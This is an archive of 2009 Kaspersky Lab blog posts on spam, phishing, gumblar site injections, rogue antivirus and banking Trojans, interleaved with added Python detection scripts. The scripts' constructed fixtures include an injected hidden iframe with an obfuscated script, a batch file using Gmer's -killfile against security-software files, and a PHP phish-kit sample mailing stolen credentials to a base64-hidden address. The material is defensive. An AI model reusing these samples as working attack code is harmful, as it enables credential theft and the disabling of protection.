Spam Test|Trick or treat?

Maria
Expert
Posted October 30, 12:55  GMT
Tags: Spam Letters

Halloween's almost here. And it's not just the witches, ghosts and ghouls you need to watch out for, but the latest wave of Internet scams. As ever, the spammers are out in force, offering cheap software:

costumes and personalized gifts:

and even e-cards!

Spam Test|Malware taxes users

Maria
Expert
Posted October 30, 11:18  GMT
Tags: Spam Letters

Last month on our Russian blog we talked about how the Zbot Trojan was being spread via spam messages which looked as though they came from the US Federal Tax authorities.

One reader commented jokingly that we should keep tabs on tax deadlines in other countries in order to detect future mass mailings of Zbot.

And then we got an email from HM Revenue and Customs, the body responsible for taxes in the UK:

Of course the link led to a phishing site which looked very like the real HMRC site:

And of course, the exe file which pretends to be a tax statement is Zbot – looks as though this Trojan likes playing taxman!

Virus Watch|The new gumblar

Michael
Kaspersky Lab Expert
Posted October 30, 10:30  GMT
Tags: Gumblar

Around October 20th we received emails from our office in Turkey about the "possible spread of a new virus". And our colleagues were right: something was going on. Some days before that, on October 16th, we noticed changes on some websites which we have been monitoring since May 2009, when 'gumblar' was spreading. While the attack in April/May worked only with iframes redirecting to two malicious sites (gumblar.cn, martuz.cn), this time the spreading servers are more widely distributed - we identified more than 202 locations.

The following is a TOP 20 list of countries with 'injected' hosts that point to these malicious URLs:

7271    UNITED STATES*
704      RUSSIAN FEDERATION
675      REPUBLIC OF KOREA
619      ISLAMIC REPUBLIC OF IRAN
540      TURKEY
510      GERMANY
499      INDIA
487      JAPAN
400      THAILAND
382      POLAND
379      BRAZIL
345      ARGENTINA
298      CZECH REPUBLIC
187      HUNGARY
182      BELGIUM
173      ITALY
163      ROMANIA
159      UKRAINE
157      FRANCE
117      VIET NAM

*Note: The US count contains more than 4000 entries pointing to a Persian Blog Site, which probably was the biggest abused entry so far.
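The injected pages described above are the kind of thing a site owner can check for without waiting on a blacklist: an iframe that is off-site and deliberately hidden, or a script block made of little but hex/unicode escapes and eval. The scanner below is an added example (not Kaspersky's tooling or anything from the campaign itself); the sample page is constructed, it only reuses the gumblar.cn hostname named in the post as a string and never fetches it, and the obfuscation threshold of three pattern hits is an assumption that should be tuned against your own clean pages.

```python
"""Heuristic scanner for 'gumblar'-style injections: hidden off-site iframes
and obfuscated <script> blocks. Added example; thresholds are assumptions."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _Collector(HTMLParser):
    """Collects iframe attributes and the text of every <script> block."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script, self._buf = True, []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


# Patterns typical of injected JavaScript stagers (hex/unicode escapes,
# eval/unescape/fromCharCode). The hit threshold is an assumption.
OBFUSCATION = re.compile(r"unescape|fromCharCode|eval\(|\\x[0-9a-f]{2}|%u[0-9a-f]{4}", re.I)
OBFUSCATION_THRESHOLD = 3


def _is_hidden(attrs):
    """1x1, display:none or visibility:hidden frames are not meant to be seen."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    try:
        tiny = int(attrs.get("width", "100")) <= 1 and int(attrs.get("height", "100")) <= 1
    except (ValueError, TypeError):      # e.g. width="100%" or a bare attribute
        tiny = False
    return tiny or "display:none" in style or "visibility:hidden" in style


def _is_offsite(src, site_host):
    host = urlparse(src).hostname or ""
    return bool(host) and host != site_host and not host.endswith("." + site_host)


def scan_html(html, site_host):
    """Return (reason, detail) findings for one page served from site_host."""
    parser = _Collector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        if _is_offsite(src, site_host) and _is_hidden(attrs):
            findings.append(("hidden_offsite_iframe", src))
    for body in parser.scripts:
        if len(OBFUSCATION.findall(body)) >= OBFUSCATION_THRESHOLD:
            findings.append(("obfuscated_script", body.strip()[:60]))
    return findings


# Constructed sample page: a legitimate visible embed and a normal script,
# plus an injected 1x1 iframe (hostname from the post) and an escape-heavy script.
SAMPLE_PAGE = r"""<html><body><h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/xyz" width="560" height="315"></iframe>
<script>document.getElementById("menu").style.display = "block";</script>
<iframe src="http://gumblar.cn/rss/?id=1" width="1" height="1" style="visibility: hidden"></iframe>
<script>var q="\x65\x76\x61\x6c";window[q](unescape("%u0061%u006c%u0065%u0072%u0074"));</script>
</body></html>"""

if __name__ == "__main__":
    for reason, detail in scan_html(SAMPLE_PAGE, "www.example.org"):
        print(reason, detail)
```

Run it over a crawl of your own site rather than a single page: the injections in this campaign were added to existing files by FTP-credential theft, so every page of a host is suspect once one is hit, and the visible YouTube embed in the sample shows why "off-site" alone is not a useful signal without the "hidden" condition.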

Research|The evolution of rogue antivirus

Dmitry Bestuzhev
Kaspersky Lab Expert
Posted October 29, 10:16  GMT
Tags: Rogue Security Solutions

We often write about the fact that cybercriminals constantly change their tactics to take account of developments in the security and software industries. And I just came across a great example of this: it shows how the people behind rogue antivirus solutions adapt their "products" to exploit developments and changes in genuine AV solutions.

A couple of months ago, Microsoft released its free anti-malware product, Microsoft Security Essentials. It's designed to ultimately replace Windows Defender, an earlier in-built antispyware product. It looks as though the guys behind the rogue AV which I just came across aren't only playing on people's fears, but on their lack of knowledge. Malware and IT threats are getting increasing coverage in the general media, but if you're not particularly interested in IT, you're not that likely to remember all the facts. Using the name "Windows Enterprise Defender" is a neat way of getting someone who might have heard of Windows Defender, and half-remembers Microsoft's latest release, to be fooled into thinking that the rogue AV is the genuine article.

Of course, the product activation process looks very similar to the genuine Microsoft process...

Incidents|A black hat loses control

VitalyK
Kaspersky Lab Expert
Posted October 22, 09:06  GMT
Tags: Cybercrime Legislation, Malware Creators

Malware writers today always try to conceal their identities, right? Wrong – even some of today’s profit driven cyber criminals reveal their identities. We are a bit surprised, but here is the story of how a blackhat has revealed his identity and is trying to ‘get compensation’ from Kaspersky for conducting research.

Recently we have been looking into a new service for malware writers: [avtracker dot info]. This is an online service designed to track AV vendors. The home page of [avtracker dot info] describes the service, which includes protection for malicious programs against analysis by malware researchers, and also calls for DDoS attacks against security companies:

Moreover, some of our fellow researchers shared a network request with us that was used to report back to [avtracker dot info]. This request was used in a special spy program which was distributed to various antivirus labs by the owner of [avtracker dot info]. If executed, this spyware would contact the owner and describe the environment of the infected machine. We played around with this request, and substituted various random strings instead of the user name and system parameters.

The WHOIS listing was of no use – [avtracker dot info] was registered anonymously. This was no surprise – cyber criminals usually do register domains anonymously to hinder identification.

So far, nothing out of the ordinary – a normal day in the life of an antivirus company. And then…surprise – the owner of the malware writers’ service contacted us and revealed his identity. Moreover, he even demanded a ransom of 2000 euro to compensate his purported losses when we attempted to ‘break’ his new toy.

At the time of writing, we have received the spy program, which had the following message in its code pointing to the same person who contacted us:

Naturally, we have gathered all relevant data and forwarded it to our lawyer who will now take the next steps. If all cyber criminals were as cooperative as this one, life would be much easier for AV companies.


Opinions|Epassports and anonymity - what I think

Eugene
Kaspersky Lab Expert
Posted October 20, 16:14  GMT
Tags: Cybercrime Legislation

There seems to be quite a loud response to what I thought was a rather simple idea. In this post, I am going to go over the main points – sometime when I have more time I’ll share my ideas in detail so people can see exactly what I am proposing.

  1. Common users are NOT anonymous for police and governments. Today the authorities can easily find any person they are after. There is a wrong perception about Internet anonymity – very few people realize that it does not exist for ordinary users. But the worst part of the story is that the ones who are truly anonymous are professional cyber criminals, because they know what to do to hide their real identities on the Internet. That is why we have millions of malicious programs and successful network attacks every year, and we don’t know who’s behind them.
  2. When I say "no anonymity" I mean only "no anonymity for security control". I don't care about the way people behave on blogs, forums, social networks and pirate torrent portals. You may use nicks or real names as you want (as we do today). The only "no more anonymity" improvement - you MUST present your ID to your Internet provider when you connect online. It is only the provider who needs to know your real identity.
  3. Another way to go is dedicated anonymous networks and dedicated business/gov networks - why not? But all LEGAL businesses/services will want to use secure networks, and insecure networks will probably be limited to casual communication.
  4. When is it going to happen? Never… or in one or two generations. After some really serious IT incidents, which will have a serious impact on national and/or global economies. I am now talking not only about cybercrime, but also about cyberterrorist attacks. We already see the first signs of emerging cyberterrorism – and global anonymity is a really favorable factor for these people.

    Imagine that everyone flying in your plane is anonymous, so you don’t know who they are and what they’re up to – are you really going to approve of this? And the Internet is as critical and as vulnerable as the air transportation network. So why do we have different security standards for these two global networks?

  5. But we are already on the way – some European countries have introduced digital IDs, which they use for secure online banking and in some cases for online voting. National and municipal elections via the Internet are not a matter of science fiction – they are already here, and ID authentication is a vital part of such election systems.

    Another prototype of e-passports is the two-factor authentication we now use to access corporate networks. The only thing that is missing today is a common standard.

Anyway, I am happy to see that my ideas have raised so much discussion; I think that open public discourse and idea-sharing is the only way to make the Internet a safer and better place.


Research|OWA Phish - a new vector (2)

Sergey Golovanov
Kaspersky Lab Expert
Posted October 15, 17:04  GMT
Tags: Botnets, Targeted Attacks

Here are some technical details to expand on the previous post from Darya.

1. The Spam

According to our preliminary research, the spam emails which attacked OWA users, including Kaspersky, were sent using the Pushdo botnet – which is based on malware from the Backdoor.Win32.NewRes family. These Trojans spread via spam, social networks (in conjunction with the Koobface family) and through hacked websites.

The spam emails link to a phishing webpage which is registered to 15 dynamic IP addresses located in separate IP sectors and which are constantly changing.

2. The Phish

An analysis of the phishing site shows that the criminals are using rock phishing techniques – a typical rock phish structure together with dynamic content which morphs to target users from the domain under attack.

3. The Trojan

This OWA phishing attack is spreading a variant of Trojan-Spy.Win32.Zbot – a Trojan which steals passwords stored on the infected machine; specifically passwords to local applications, passwords to websites etc. The Trojan also has keylogger functionality. Finally, this Zbot can also download other malware if required. In this instance, the command and control center is located in Ukraine.

Summary

This particular attack is using well-known methods overall. The notable features of the attack are the domain name spoofing and the creation of a phishing site which mimics OWA pages. The rest is as usual.


Incidents|OWA Phish - a new vector

Darya Gudkova
Kaspersky Lab Expert
Posted October 15, 15:09  GMT
Tags: Targeted Attacks

Yesterday we saw a phishing attack targeting users of Outlook Web Access (OWA) service – used worldwide to access email from Microsoft Exchange Servers via the Internet. Users received emails which told them that a security upgrade required them to apply new settings by clicking on the enclosed link.

This is a typical phishing text, but the criminal used domain spoofing to make the email seem as if it came from the recipient’s own domain. In reality, by clicking on the link victims landed on a phishing page which only looked like a standard OWA page.

Once on the phishing page, the user was asked to download an .exe file in order to update security settings. Instead of security updates, the victims were installing a Zbot Trojan (Trojan-Spy.Win32.Zbot family).

Interestingly enough, all of the phishing domains were in the .eu and .co.uk zones – which is actually a rare case, since most phisher domains are located in Third World countries.

OWA is a popular service in the business community today so the phishers are likely to reach significant numbers of people. Once again, we remind people to check emails carefully before clicking on links – and recommend network admins to warn their users about this attack.

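The two OWA posts above (Darya's description of the spoofed sender domain and Sergey's technical follow-up) describe a pattern a mail gateway or analyst can test for mechanically: the From header carries the recipient's own domain, yet the message was handed to the organisation's inbound MX by an outside host, and the "update" link leaves the organisation. The checker below is an added example, not Kaspersky's or anyone's production filter; the organisation domain, the set of trusted relays and both sample messages are constructed (the look-alike hostname in the phish sample is invented to illustrate the domain-spoofing trick, not a domain from the attack).

```python
"""Header/body checks for the OWA phish pattern: mail that claims to come from
the recipient's own domain but was handed to our MX by an outside host, and
links that leave the organisation. Added example, not Kaspersky's tooling."""
import email
import re
from email.utils import parseaddr

ORG_DOMAIN = "example.com"                                      # assumption
TRUSTED_RELAYS = {"mx1.example.com", "mailstore.example.com"}  # assumption: our own MTAs

RECEIVED = re.compile(r"\bfrom\s+(\S+).*?\bby\s+(\S+)", re.S | re.I)
LINK = re.compile(r"https?://([^/\s\"'<>]+)", re.I)


def _domain(addr):
    return parseaddr(addr)[1].rsplit("@", 1)[-1].lower()


def _clean(host):
    return host.strip("[]();,").lower()


def _is_internal(host):
    return host in TRUSTED_RELAYS or host == ORG_DOMAIN or host.endswith("." + ORG_DOMAIN)


def _handoff_hosts(msg):
    """Hosts that handed the message to one of our trusted relays
    (the 'from X' of every 'Received: from X ... by <trusted relay>')."""
    hosts = []
    for rcvd in msg.get_all("Received", []):
        m = RECEIVED.search(rcvd)
        if m and _clean(m.group(2)) in TRUSTED_RELAYS:
            hosts.append(_clean(m.group(1)))
    return hosts


def check_message(raw):
    """Return a list of flags; an empty list means nothing suspicious was found."""
    msg = email.message_from_string(raw)
    flags = []
    # Only a message claiming to be internal mail is held to the origin check.
    if _domain(msg.get("From", "")) == ORG_DOMAIN and _domain(msg.get("To", "")) == ORG_DOMAIN:
        for host in _handoff_hosts(msg):
            if not _is_internal(host):
                flags.append("internal_sender_external_origin:" + host)
    body = "" if msg.is_multipart() else msg.get_payload()
    for host in LINK.findall(body):
        if not _is_internal(host.lower()):
            flags.append("offsite_link:" + host.lower())
    return flags


# Constructed messages: the phish (spoofed internal From, outside origin,
# look-alike link) and a genuine internal notice for comparison.
PHISH = """\
Received: from mx1.example.com (mx1.example.com [10.0.0.5])
    by mailstore.example.com with ESMTP; Wed, 14 Oct 2009 09:12:01 +0000
Received: from [203.0.113.9] (unknown [203.0.113.9])
    by mx1.example.com with SMTP; Wed, 14 Oct 2009 09:11:58 +0000
From: "IT Department" <administrator@example.com>
To: jdoe@example.com
Subject: Outlook Web Access security upgrade
Content-Type: text/plain

A security upgrade requires new settings for your Outlook Web Access account.
Apply them here: http://example.com.owa-update.eu/owa/auth/settings.exe
"""

LEGIT = """\
Received: from helpdesk.example.com (helpdesk.example.com [10.0.1.7])
    by mx1.example.com with ESMTP; Wed, 14 Oct 2009 08:00:00 +0000
From: IT Department <helpdesk@example.com>
To: jdoe@example.com
Subject: Maintenance window
Content-Type: text/plain

OWA will be unavailable tonight; status at https://owa.example.com/status
"""

if __name__ == "__main__":
    print(check_message(PHISH))   # two flags
    print(check_message(LEGIT))   # []
```

Two things the sample makes visible: only the Received line written by one of your own relays is trustworthy (anything below it can be forged by the sender), and a hostname that merely starts with your domain, like `example.com.owa-update.eu`, is not your domain; the suffix check in `_is_internal` is what catches that.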

News|Multiple critical patches - a busy day

Josh
Kaspersky Lab Expert
Posted October 13, 21:18  GMT
Tags: Microsoft Windows, Microsoft Internet Explorer

Today marks the largest Patch Tuesday ever from our friends in Redmond, with 13 bulletins addressing a total of 34 vulnerabilities. Three of them have had public exploit code posted, while 11 are rated as likely to be consistently exploitable.

The most alarming vulnerability this month is MS09-050 which, according to its discoverer, was introduced by the patch for MS07-063. It was first disclosed publicly on security researcher Laurent Gaffié’s blog on September 7th as a denial of service vulnerability in SMB 2.0, specifically in the srv2.sys driver. You might remember some of the buzz when this was first released, as several people immediately pointed out that this was not only a denial of service but could easily lead to remote code execution. What should be just as concerning for Microsoft, however, is the fact that the vulnerability affects Windows Vista and Windows Server 2008 (and pre-release builds of Windows 7) but not Windows XP - not an encouraging sign.

Included in this release are also updated kill bits for ActiveX controls à la MS09-035, which if you remember was related to several vulnerabilities in ATL. Also, MS09-060 appears to address these vulnerabilities as they pertain to MS Office. It’s less than settling to see that this vulnerability still has not been fully patched.

Another highly visible patch this month is the fix for the SSL certificate impersonation vulnerability, MS09-056. Those who attended Black Hat Las Vegas in July won’t have forgotten that this was the exploit being enthusiastically described to a standing-room-only audience by Moxie Marlinspike. Interestingly enough, this vulnerability was discovered by Dan Kaminsky.

As always, make sure to apply these patches as soon as possible and especially this month if you are using Windows Vista or later with SMB enabled!


Incidents|Friendly fire

Fabio Assolini
Kaspersky Lab Expert
Posted October 13, 21:02  GMT
Tags: Internet Banking

During routine malware analysis we sometimes find new techniques being used by Brazilian cybercriminals to remove security protection. Now Brazilian banking Trojans are using Gmer, a well-known standalone anti-rootkit tool, to remove GBPlugin, a very popular security mechanism used by the four largest Brazilian banks. There are around 15 million Brazilian computers running GBPlugin, which is designed to prevent the theft of personal banking data.

It’s common behavior for malware developers to use legitimate software to remove antivirus and other security solutions. We saw it with Sysinternals PsExec. In Brazil this is the second time we know of that local malware has used a legitimate tool; the first was when Avenger, another anti-rootkit tool, was used to remove the same GBPlugin files.

The malware which we've just looked at downloads an old version of Gmer (1.014) from a legitimate, but compromised, Chinese server. It saves it as %System%\logsvc.exe and, once it's installed, the malware registers a special service to remove GBPlugin using rootkit techniques.

A bat file is created on the system and inside the file you can see the commands designed to kill all running files of GBPlugin, using Gmer's -killfile parameter.



Another driver with commands to delete the GBPlugin files is installed to ensure that all the files will be removed:



This Trojan is already detected by our products as Trojan-Downloader.Win32.Homa.yw, and the driver is detected as Rootkit.Win32.Agent.neg.

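The detection opportunity in this post is behavioural rather than signature-based: a legitimate anti-rootkit binary, renamed and dropped into the system directory, being driven with its -killfile switch against another vendor's files, either directly or from a batch file. The hunt below is an added example (not Kaspersky's detection and not code from the sample); the process-creation log format is constructed, the GBPlugin file names in the sample are illustrative rather than taken from the Trojan, and the list of names the tool normally ships under is an assumption.

```python
"""Hunt for anti-rootkit tools repurposed to kill security software: Gmer's
-killfile switch driven from a renamed copy (logsvc.exe in the post) or from
a batch file. Added example; the log format and file names are constructed."""
import ntpath
import re

KNOWN_TOOL_NAMES = {"gmer.exe"}   # assumption: the names the tool normally ships under
KILL_SWITCH = "-killfile"

# Constructed log format: "... image=<path> cmd="<command line>""
LOG_LINE = re.compile(r'image=(?P<image>\S+)\s+cmd="(?P<cmd>[^"]*)"')


def killfile_target(cmd):
    """Return the path passed to -killfile, or None if the switch is absent."""
    idx = cmd.lower().find(KILL_SWITCH)
    if idx < 0:
        return None
    return cmd[idx + len(KILL_SWITCH):].strip().strip('"') or None


def find_killfile_abuse(log_lines):
    """Flag every process that invokes -killfile, and note when the image is not
    the tool's usual name, which is how the banking Trojan hides its Gmer copy."""
    findings = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        target = killfile_target(m.group("cmd"))
        if target is None:
            continue
        image = m.group("image")
        findings.append({
            "image": image,
            "target": target,
            "renamed_tool": ntpath.basename(image).lower() not in KNOWN_TOOL_NAMES,
        })
    return findings


def killfile_targets_from_bat(text):
    """Extract every -killfile target from a dropped .bat file."""
    return [t for t in (killfile_target(line) for line in text.splitlines()) if t]


# Constructed process-creation log and dropped batch file. The GBPlugin
# file names are illustrative, not taken from the analysed sample.
SAMPLE_LOG = r"""
2009-10-13 14:02:11 pid=1720 image=C:\WINDOWS\system32\logsvc.exe cmd="logsvc.exe -killfile C:\PROGRA~1\GbPlugin\gbpsv.exe"
2009-10-13 14:02:12 pid=1724 image=C:\WINDOWS\system32\logsvc.exe cmd="logsvc.exe -killfile C:\WINDOWS\system32\gbieh.dll"
2009-10-13 14:05:00 pid=1900 image=C:\Tools\gmer.exe cmd="gmer.exe"
2009-10-13 14:06:30 pid=1950 image=C:\WINDOWS\system32\notepad.exe cmd="notepad.exe C:\temp\notes.txt"
""".strip().splitlines()

SAMPLE_BAT = r"""@echo off
%SystemRoot%\system32\logsvc.exe -killfile C:\PROGRA~1\GbPlugin\gbpsv.exe
%SystemRoot%\system32\logsvc.exe -killfile C:\WINDOWS\system32\gbieh.dll
del %0
"""

if __name__ == "__main__":
    for f in find_killfile_abuse(SAMPLE_LOG):
        print(f)
    print(killfile_targets_from_bat(SAMPLE_BAT))
```

The interactive Gmer run in the sample log (no -killfile) is deliberately not flagged: analysts use the tool legitimately, and it is the kill switch aimed at another product's files, from a binary that is not called gmer.exe, that distinguishes this Trojan's use of it. A fuller rule would also match on the renamed file's PE version resource rather than its name alone.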

Incidents|How to fight corruption

Maria
Expert
Posted October 13, 16:17  GMT
Tags: Spam Letters

Imagine you live in the former Soviet Union. Now imagine that you get a message saying 'How to overcome GAI corruption' [GAI – State Automobile Inspectorate, or, to put it more crudely, the traffic cops].

You're a driver, so you've likely been stopped by a cop or two in your time, and maybe made to cough up some money on a flimsy pretext. Yes, corruption's something you'd like to see stopped.

So you read on, and find out that you can send your suggestions to the head of the GAI by sending an SMS to a short number. The message even tells you that this service is supported by the Ukrainian Automobile State Inspectorate.

Is this scam starting to sound familiar? It's not just cops who are corrupt...


Incidents|All your phish are belong to me

Michael
Kaspersky Lab Expert
Posted October 13, 15:59  GMT
Tags: Spammer techniques

Today I got an 'Anti-virus notification message' from our mail server (protected by kav4lms), so naturally I was interested in what the content was. Examining the quarantined mail on the server revealed some interesting details, starting with the mail header itself:

"X-PHP-Script: <removed>.com/templates/beez/woolf2.php for 41.248.<xx.xx>"

The message had come from a compromised host and a PHP mailer was used directly from there to send phishing mails.

A quick trip to the location mentioned in the header showed a mass mailer GUI containing a link to a spammer site which is currently offline. But a little digging around showed the site had been hosting 'phish kits' - collections of malicious files which can be downloaded 'for free'.

These 'phish kits' are archives which just need to be extracted to a compromised server. All a cybercriminal needs to do (apart from finding a compromised server) is edit one of the files in that package and input a mail address where harvested information should be sent to. The twist is - not only does the information get sent to the designated email address, but to another cybercriminal as well.

This scam is nothing new, but less experienced bad guys might not realize that they're sharing their ill-gotten gains with other, more technically savvy, blackhats.

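Both halves of this post can be checked with a few lines of code: the X-PHP-Script header names the script on the compromised host and the client that drove it, and a phish kit's "twist" is an extra recipient that the kit's user never sees because it is not in the configuration file in clear text. The code below is an added example, not the mailer, the kit or any Kaspersky tool from the post; the kit files are constructed (two PHP files, one visible recipient, one recipient stashed as base64), and the header value it parses is a made-up one in the same shape as the quoted header.

```python
"""Two checks from the post: pull the sending script and client out of an
X-PHP-Script header, and find every mail recipient hidden in a phish kit,
including ones stashed as base64. Added example with constructed kit files."""
import base64
import re

X_PHP_SCRIPT = re.compile(r"X-PHP-Script:\s*(?P<script>\S+)\s+for\s+(?P<client>\S+)", re.I)
ADDRESS = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def parse_x_php_script(header_line):
    """Return (script path, client address) from an X-PHP-Script header, or None."""
    m = X_PHP_SCRIPT.search(header_line)
    return (m.group("script"), m.group("client")) if m else None


def find_recipients(kit):
    """kit maps file name -> PHP source. Returns {address: {(file, how), ...}}
    where 'how' records whether the address was in clear text or base64."""
    found = {}
    for name, src in kit.items():
        for addr in ADDRESS.findall(src):
            found.setdefault(addr, set()).add((name, "plain"))
        for blob in B64_CALL.findall(src):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
            except ValueError:       # binascii.Error is a ValueError subclass
                continue
            for addr in ADDRESS.findall(decoded):
                found.setdefault(addr, set()).add((name, "base64"))
    return found


def hidden_recipients(kit):
    """Addresses that never appear in clear text: the kit author's own copy."""
    return sorted(a for a, seen in find_recipients(kit).items()
                  if all(how != "plain" for _, how in seen))


# Constructed kit: config.php is what the kit user edits; login.php also mails
# the harvested credentials to an address the user never sees in the clear.
_HIDDEN = base64.b64encode(b"kitauthor@example.org").decode()
SAMPLE_KIT = {
    "config.php": '<?php\n$to = "operator@example.net"; // edit me\n?>',
    "login.php": (
        '<?php\ninclude("config.php");\n'
        '$msg = "User: " . $_POST["username"] . "\\nPass: " . $_POST["password"];\n'
        'mail($to, "OWA login", $msg);\n'
        f'mail(base64_decode("{_HIDDEN}"), "OWA login", $msg);\n'
        'header("Location: https://owa.example.net/");\n?>'
    ),
}

if __name__ == "__main__":
    print(parse_x_php_script(
        "X-PHP-Script: www.example.net/templates/beez/woolf2.php for 203.0.113.7"))
    print(find_recipients(SAMPLE_KIT))
    print("hidden:", hidden_recipients(SAMPLE_KIT))
```

Real kits also hide the second address with str_rot13, string concatenation or a remote include, so the base64 branch is the pattern to extend rather than the whole answer; a reviewer who greps a kit only for `@` will miss exactly the address this post is about. On the header side, the script path under templates/ is the kind of location a compromised CMS install exposes, which is where to start the clean-up on the sending host.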

Events|ISSE 2009

Costin Raiu
Kaspersky Lab Expert
Posted October 07, 14:33  GMT
Tags: Conferences

Greetings from the “Steigenberger Kurhaus Hotel” in The Hague, or “Den Haag”, as the locals like to call it, where the 2009 ISSE Conference is currently taking place.

I’m here with my colleague Stefan (in the pic), who delivered his presentation on WEB 2.0 threats earlier today, on the second day of the conference.

Yesterday was the grand opening day, with a number of interesting speeches. Norbert Pohlmann, Chairman of the Board, TeleTrusT, had a very interesting talk about the way we'll work in the future. His data indicates that today we have about 70 CPUs per person, in netbooks, cars, mobiles etc…but we'll reach thousands of CPUs per person in the next 10 years.

Jim King, PDF Platform Architect, from Adobe Systems Incorporated, delivered a very interesting presentation on the advantages of using PDF and embedding digital signatures into them. With PDF being today's file format of choice for malware delivery, it may be that some organizations start moving away from PDF files. This is why it's very important that Adobe begins what Microsoft did in 2002 with the Trustworthy Computing Initiative.

Mike Reavey, Director of the MSRC (Microsoft), delivered a very interesting speech explaining the MSRC process; he did say a few controversial things which generated heated debate afterwards – for instance, “There are hackers who actually work at Microsoft”.

All the best from the cloudy Netherlands!
